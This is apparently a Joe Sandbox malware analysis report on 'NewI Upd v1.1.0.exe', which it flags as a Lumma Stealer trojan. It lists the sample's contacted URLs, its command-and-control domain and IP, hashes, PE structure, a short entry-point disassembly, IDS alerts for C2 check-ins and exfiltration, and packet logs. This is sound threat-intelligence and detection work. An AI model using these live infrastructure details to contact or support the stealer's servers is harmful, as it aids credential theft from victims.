                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://begguinnerz.biz:443/apiOONewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.microXNewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000195F000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://begguinnerz.biz/$NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://begguinnerz.biz/apiz/NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://x1.c.lencr.org/0NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallNewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.microsofNewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://begguinnerz.biz/LNewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesNewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.mozilla.org/products/firefoxgro.allNewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://begguinnerz.biz/pilNewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://begguinnerz.biz/DNewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://begguinnerz.biz:443/apiNewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.190.223
                                                                                begguinnerz.bizUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1581123
                                                                                Start date and time:2024-12-27 03:00:05 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 57s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:5
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:NewI Upd v1.1.0.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 83%
                                                                                • Number of executed functions: 41
                                                                                • Number of non-executed functions: 158
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                TimeTypeDescription
                                                                                21:03:10API Interceptor8x Sleep call for process: NewI Upd v1.1.0.exe modified
                                                                                No context
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSsetup.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.197.192
                                                                                exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.218.163
                                                                                http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                https://pdf-ezy.com/pdf-ez.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.152.3
                                                                                b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                • 172.67.194.29
                                                                                tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • 104.21.49.159
                                                                                phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                • 172.67.214.186
                                                                                https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1setup.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                                • 172.67.190.223
                                                                                installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                • 172.67.190.223
                                                                                0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                RUUSfr6dVm.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                9idglWFv95.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.190.223
                                                                                No context
                                                                                No created / dropped files found
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.116294587223981
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:NewI Upd v1.1.0.exe
                                                                                File size:2'757'632 bytes
                                                                                MD5:f186a87680772f195f865cedab080b6d
                                                                                SHA1:3eae87351603339cb281f0f89722e5b5238d476d
                                                                                SHA256:fc07dfae95323c988627ac7e858d37dd165e34b25d5c2a00705caf8fea594e01
                                                                                SHA512:b3d4b54fb822cfe19da385e6f6b416d864f909dcf8b4c3f5c30e0d739da39cead15cb73dbad4ad453a7820f9497f09a1f2aa6e37a79d3e21a5215e945633e4f1
                                                                                SSDEEP:49152:onVl/s1RAH1X6YX8r27yEhYZQegaycHlr+HHkKTfS4UkvTdssev116yZzna1Wy33:qm1RAJ6YX8r27yEhYZQwpHlr+HHkKTfS
                                                                                TLSH:0BD5AE3C2660D81ADF6B86F0DA67269D8C5D28738B8FF9CB138931F948239EC4571197
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..
                                                                                Icon Hash:b1b0b0b08888b0a2
                                                                                Entrypoint:0x64d010
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x676BEF47 [Wed Dec 25 11:40:55 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:4159edb38142459c0d592c68fcfb12bb
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                call 00007F22B91D770Dh
                                                                                pop ebp
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push 00000000h
                                                                                call dword ptr [0067F018h]
                                                                                mov eax, dword ptr [ebp+08h]
                                                                                push eax
                                                                                call dword ptr [0067F014h]
                                                                                push C0000409h
                                                                                call dword ptr [0067F01Ch]
                                                                                push eax
                                                                                call dword ptr [0067F020h]
                                                                                pop ebp
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000324h
                                                                                push 00000017h
                                                                                call dword ptr [0067F024h]
                                                                                test eax, eax
                                                                                je 00007F22B91D7A09h
                                                                                mov ecx, 00000002h
                                                                                int 29h
                                                                                mov dword ptr [00690EA0h], eax
                                                                                mov dword ptr [00690E9Ch], ecx
                                                                                mov dword ptr [00690E98h], edx
                                                                                mov dword ptr [00690E94h], ebx
                                                                                mov dword ptr [00690E90h], esi
                                                                                mov dword ptr [00690E8Ch], edi
                                                                                mov word ptr [00690EB8h], ss
                                                                                mov word ptr [00690EACh], cs
                                                                                mov word ptr [00690E88h], ds
                                                                                mov word ptr [00690E84h], es
                                                                                mov word ptr [00690E80h], fs
                                                                                mov word ptr [00690E7Ch], gs
                                                                                pushfd
                                                                                pop dword ptr [00690EB0h]
                                                                                mov eax, dword ptr [ebp+00h]
                                                                                mov dword ptr [00690EA4h], eax
                                                                                mov eax, dword ptr [ebp+04h]
                                                                                mov dword ptr [00690EA8h], eax
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                mov dword ptr [00690EB4h], eax
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x28db5c0x3c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2930000x77e9.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x29b0000xb004.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x28cb1c0x54.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28cb700x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x27f0000x138.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x27d10a0x27d200d66623399ce61ad5327a4cd7f599641cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x27f0000xf2540xf400bc7088c947c817b8285f4a700fbc7be6False0.32444287909836067data4.581976872219791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x28f0000x2ee80x1e00bc0e63525bb52951ab4493ef3b33a89fFalse0.5591145833333333data6.1623762929451535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .fptable0x2920000x800x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x2930000x77e90x780097cb107d31eedbbe8ca8ac8974da4fbaFalse0.52529296875data4.805907824282731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x29b0000xb0040xb200576f624b5b43b9cba6fd0c26c6f5aee8False0.7525456460674157data6.82489368421326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x2936880x183ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8991298743151789
                                                                                RT_MENU0x294ec80x58cdata0.5309859154929577
                                                                                RT_MENU0x2954540x4e0data0.5256410256410257
                                                                                RT_DIALOG0x2959340x230data0.5892857142857143
                                                                                RT_DIALOG0x295b640x4d8data0.49112903225806454
                                                                                RT_DIALOG0x29603c0x3d0data0.5133196721311475
                                                                                RT_DIALOG0x29640c0x548data0.4807692307692308
                                                                                RT_DIALOG0x2969540x32cdata0.562807881773399
                                                                                RT_DIALOG0x296c800x520data0.5083841463414634
                                                                                RT_DIALOG0x2971a00x378data0.5472972972972973
                                                                                RT_DIALOG0x2975180x248data0.6078767123287672
                                                                                RT_DIALOG0x2977600x30cdata0.5384615384615384
                                                                                RT_DIALOG0x297a6c0x2fcdata0.5327225130890052
                                                                                RT_DIALOG0x297d680x434data0.5092936802973977
                                                                                RT_DIALOG0x29819c0x554data0.5029325513196481
                                                                                RT_DIALOG0x2986f00x3ccdata0.507201646090535
                                                                                RT_DIALOG0x298abc0x6d0data0.46559633027522934
                                                                                RT_DIALOG0x29918c0x368data0.5389908256880734
                                                                                RT_STRING0x2994f40x178data0.601063829787234
                                                                                RT_STRING0x29966c0x18cdata0.6035353535353535
                                                                                RT_STRING0x2997f80x190data0.5975
                                                                                RT_STRING0x2999880x1a0data0.6129807692307693
                                                                                RT_STRING0x299b280x180data0.59375
                                                                                RT_STRING0x299ca80x174data0.6155913978494624
                                                                                RT_STRING0x299e1c0x180data0.609375
                                                                                RT_STRING0x299f9c0x19cdata0.6092233009708737
                                                                                RT_STRING0x29a1380x184data0.6185567010309279
                                                                                RT_STRING0x29a2bc0x8cdata0.6857142857142857
                                                                                RT_GROUP_ICON0x29a3480x14data1.05
                                                                                RT_VERSION0x29a35c0x310data0.5063775510204082
                                                                                RT_MANIFEST0x29a66c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                DLLImport
                                                                                KERNEL32.dllVirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle
                                                                                USER32.dllMessageBoxA, MessageBoxW
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-27T03:03:10.424698+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449883172.67.190.223443TCP
                                                                                2024-12-27T03:03:11.195565+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449883172.67.190.223443TCP
                                                                                2024-12-27T03:03:11.195565+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449883172.67.190.223443TCP
                                                                                2024-12-27T03:03:12.520456+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449889172.67.190.223443TCP
                                                                                2024-12-27T03:03:13.311805+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449889172.67.190.223443TCP
                                                                                2024-12-27T03:03:13.311805+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449889172.67.190.223443TCP
                                                                                2024-12-27T03:03:15.056791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449895172.67.190.223443TCP
                                                                                2024-12-27T03:03:16.071033+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449895172.67.190.223443TCP
                                                                                2024-12-27T03:03:17.385054+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449902172.67.190.223443TCP
                                                                                2024-12-27T03:03:19.610771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449907172.67.190.223443TCP
                                                                                2024-12-27T03:03:22.349274+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449914172.67.190.223443TCP
                                                                                2024-12-27T03:03:24.433081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449920172.67.190.223443TCP
                                                                                2024-12-27T03:03:27.179953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449926172.67.190.223443TCP
                                                                                2024-12-27T03:03:27.935946+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449926172.67.190.223443TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 27, 2024 03:03:09.102252960 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:09.102318048 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:09.102402925 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:09.105305910 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:09.105320930 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:10.424614906 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:10.424698114 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:10.426286936 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:10.426295996 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:10.426536083 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:10.469324112 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:10.479543924 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:10.479559898 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:10.479655981 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:11.195583105 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:11.195744038 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:11.196011066 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:11.197743893 CET49883443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:11.197756052 CET44349883172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:11.213727951 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:11.213748932 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:11.213819027 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:11.214096069 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:11.214106083 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:12.520191908 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:12.520456076 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:12.521989107 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:12.521997929 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:12.522203922 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:12.523471117 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:12.523494005 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:12.523535013 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.311811924 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.311889887 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.311923981 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.311947107 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.311975002 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.312035084 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.312041998 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.320133924 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.320194960 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.320200920 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.331402063 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.331556082 CET49889443192.168.2.4172.67.190.223
